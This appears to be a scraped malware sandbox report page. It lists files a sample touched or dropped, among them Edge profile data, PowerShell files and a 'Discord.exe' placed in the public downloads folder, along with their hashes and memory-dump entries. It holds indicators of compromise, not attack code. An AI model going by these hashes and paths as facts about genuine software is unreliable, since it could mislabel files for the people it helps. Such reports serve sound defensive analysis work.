5408de1548eb3231accfb9f086f2b9db

SHA1
f2d8c7e9f3e26cd49ee0a7a4fecd70b2bf2b7e8a

SHA256
3052d0885e0ef0d71562958b851db519cfed36fd8e667b57a65374ee1a13a670

SHA512
783254d067de3ac40df618665be7f76a6a8acb7e63b875bffc3c0c73b68d138c8a98c437e6267a1eb33f04be976a14b081a528598b1e517cdd9ad2293501acc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
254fc2a9d1a15f391d493bff79f66f08

SHA1
6165d5a9de512bb33a82d99d141a2562aa1aabfb

SHA256
2bf9282b87bdef746d298cff0734b9a82cd9c24656cb167b24a84c30fb6a1fd0

SHA512
484a1c99ee3c3d1ebf0af5ec9e73c9a2ca3cf8918f0ba2a4b543b75fa587ec6b432866b74bcd6b5cdd9372532c882da438d44653bd5bccdbc94ebc27852ff9e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
afd4ded20bfb15462764f2f574843b2d

SHA1
1c9ba1a9e8c324d1fa5e051c2505e064b41d4403

SHA256
d38a10a857805d61a1a3841db0134e709c41bcfaaa6ce7e71080b55762f209c9

SHA512
866b28f81ae84bb68c79382993e2b0b514556056b5658a7558135cf7b41a04a2ff45f2f834c171c930b51acc31e4437325c43bd4f85bb08268127f1e88094a1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
057d6f211d651564f3031aa480ea631a

SHA1
601ff495cafef9f0ed0890ce4a3da367f225a440

SHA256
6e8216a5b1bb08fd557c1544d75458f60f65a142aa57b51436e4a8d9d1f400b1

SHA512
b32cb3f05de1bcd38d73de14e935e5f4ccf209afe542989497c8d01aa306e82fe6768241be0b9afe5b5312a230f3b39b59d327d0a7c87cd61980f18a753296a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
48febe0b0625901956573dfb2378e7ed

SHA1
c324173a8f8fd7a6a7398f6bb24dd2ee11d3cf24

SHA256
f0fae7ad33efdd05845d0d631ce8341ea4b6dfd4c45be844f0c117738df9c0d0

SHA512
fc38a0c64e67e3b5d43f787fe86f700e6f753d8e90bcebc446d4a8c631b9e4362a74fa862a5b2ffc74f3f5236d3ecf006b341042b5469d1cc24f2c325a607a91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
bc3a0ca62cfef580ff9ebbb7afc92b9b

SHA1
fde9832ce521fcd53850d0701a543ef75b772e3b

SHA256
b0203fb7c3812937e92ac04ad6065a2129bc165a36a60a4d2fdb0accc4499464

SHA512
fc1f3a5bd2106d9b6ed5a678c2f4978550a0d7414172b0ce6954a835b0da01ac28c177955a48c2ef56ea3d517a6672474a9cab873aeccae3f22a45ccf2d070de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
a75c3c936ef6cf50580ead185e5bb3d3

SHA1
790e32578070b6bb568823a4c3bfd1372c9c578d

SHA256
02ff1e0ccec99efcb17f34540bd7e311f9804ddee15dea71090d0d3e6b7d6de5

SHA512
d661c72d2d284f72cd04223a4f702783f2d3b17c2a4e3df0a704a60167202b31d82f48d4bcb4d8f968765c1a987297d141ad5356711c657a8b0e36e56646497e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
67362198aba3962fc88e26f88a5ee9fe

SHA1
95003f53d3f7da1fdb6e62922c3255c920c31435

SHA256
b477c050b026d30d5ce363e271ff46a5519f9217fcc51e5c4730e4646b881139

SHA512
d376f78d0700a636eb3ca95e9648a40114a9e973e0ca7382f313e63d7bb2506bc68e5751bcf247ac4556b1b935ebdf3452e01dcac96574b402140e498b934b6d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4115b6aec6e8175d5ba82ea5d6814e4

SHA1
c5f4b102a89d96e4e3d42184d14faf2d5ea25791

SHA256
6c040aa37326b1490a81680367d627442685327f974e34afb08ca45ca0681276

SHA512
1883d7153e86c5a9df2d5bcd579034208225706f40f544ffb7692cb3fa625cfea992105e551486ce23a12ee905c60b133783324d3604563da7371cd54c9a598e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73fcdfef85580ce2ff184c4075fade28

SHA1
0881fe3066ccb452df0c7fdd1b14166f284d7334

SHA256
3a0faf79cdfa77a301682fafb853fb6435a94fda4808fac99da34822b551f7d5

SHA512
14b6ab328ff5c7eb0f85689cb49b90cd04f1d3668230748712eb6e7635da17c219eace8e7caddc6a59c0ef5fb602eadd4e8dc2b305e6cf767d305237cd616d74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ada0b2dfa7963d4d42350eccd4b1a5f6

SHA1
3365e4e0f7d23e0cd42ef1f34560e8d6f42998db

SHA256
a08e822ff97542d0c2362219705bacfef5a89b8c35f1a1742a8ad110132f92bd

SHA512
f44fd4a6a5ad52da6dbdd74dbb78aa48fbdd74cbde680a6deb8b439599b6de68c68925a36888ee56860a1d60e1f238bb50b5534ac19c48351ea11476777b9a03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d642fc7d81b5bbd83917ddfe2d825b68

SHA1
08e8e419f14f199dda7d8c3fce76dda78533c98d

SHA256
fe31f6f997ab553aeaf225f341bc190d1fa11827ffcafd8ce0f2d5d9ab303bad

SHA512
99e097a8a23e2970e576f427ba9056ab47bc9251ac4844c6dbce5d0d5cd642aae1580af667737c4736210e5de79c50920a3ebc07add300b79f2bc0f2fdf6559b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2c47722271a294ddbbd40a7291d6e6e8

SHA1
5aa70d8563cb788c243eaad08bfbd48f37ac92b5

SHA256
8382357e092ecaab856ac120574d132dc2fe8042b9b4e51a8954ebf44478c569

SHA512
3a62bc96c6b2efba502a19ffc427893fdb0536da5caadd5336579329dd283d99f409bb0259b68a21601de77d47f850e3ab00cb9bdd0a97d1c0cdf0d2b2a03247

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkzc5rps.4ex.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
0d3e6f77195f62285ff86b5c1330d85b

SHA1
998b1a54d7bbaf0028a0e482ef92e81082ec5c29

SHA256
101a39d28fc91b78a1a44738740ec2af614573e7218c7bae7dd5015c10410966

SHA512
ded008a0ad949dc4e7e7c6788b6363f69a530b491e6617d828e51252ffa4b1899a38a8a0dbcdbbfc421d9e4da6f6e92230d67b4904e22daaf01c65a91491fbe0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
f63da4c71f9e09ee6a43ea3f759c8ba3

SHA1
590c4dd22496cdab128c9e79412f54d56bff8e81

SHA256
b970d3ce75bf725f5d0067ddd595b5d280db1e88649c06ca3dffead9967af4d2

SHA512
3f98968d42ee51fde91f17a9926a28c8efa74de3d7a589f2a4d981e10ce8b8138f126917bca986b3c64f4e8b79635caf35896ad73fe8353b3e7377c7eea1a547

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
b8c59ba5e938c0259d4ed2db9ccbe469

SHA1
d5b19fd8914a6381ac52be197ad15dec90b0f8ab

SHA256
67664a0b81ba8c28c474450decf67b0b40669547b7a7fe78737415e90db283fd

SHA512
55b222c33d1ca84a4816a98bdaa284b4398d4f58c8a3b00485afc6deac659173ab4aaf1b083b18bc5bf08ee64a3fa5260195e83abc90aef4883c96e7ffd48179

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
4117eccbe5bc52e82071987f677c2a14

SHA1
03521f8af9a7f88d3c4502888a7eec86e74ff937

SHA256
231ea2bca5d79fc6d10bfeb702a334b1f93f88f731867df00da48ec8db6130e0

SHA512
803be5a1afab592d41781493628e75fd3020b546fb2202bbc01204611d44a45bb8aac635ce16efa681a3b0c21d48f127e1cc320049c761563d29f04e178be06e

Download Submit
C:\Users\Public\Downloads\Discord.exe

Filesize
66KB

MD5
879e4ad359e88bc384ee197e68728b50

SHA1
f7547bfe974d52fe71c5e8f5e8195732f1736509

SHA256
0cfc81ec769e4cb977cd2fadc68a766a2a80f80691c0b8f8517f468b8cf4fdfe

SHA512
23cc1aa66bf4158310258bcfa806c89085ec43a0f476d4e46d6da8c4f91a38b8b653a7a50c736592894d29301f95ef76866c3d920f1aeb2d51248bbeaa144e97

Download Submit
memory/3872-16-0x00007FF87CEB0000-0x00007FF87D972000-memory.dmp

Filesize
10.8MB

Download
memory/3872-2-0x00007FF87CEB3000-0x00007FF87CEB5000-memory.dmp

Filesize
8KB

Download
memory/3872-14-0x00007FF87CEB0000-0x00007FF87D972000-memory.dmp

Filesize
10.8MB

Download
memory/3872-18-0x00007FF87CEB0000-0x00007FF87D972000-memory.dmp

Filesize
10.8MB

Download
memory/3872-13-0x00007FF87CEB0000-0x00007FF87D972000-memory.dmp

Filesize
10.8MB

Download
memory/3872-8-0x0000018F15800000-0x0000018F15822000-memory.dmp

Filesize
136KB

Download
memory/4332-36-0x00000201C6D40000-0x00000201C6F02000-memory.dmp

Filesize
1.8MB

Download
memory/6108-287-0x0000000000B40000-0x0000000000B56000-memory.dmp

Filesize
88KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads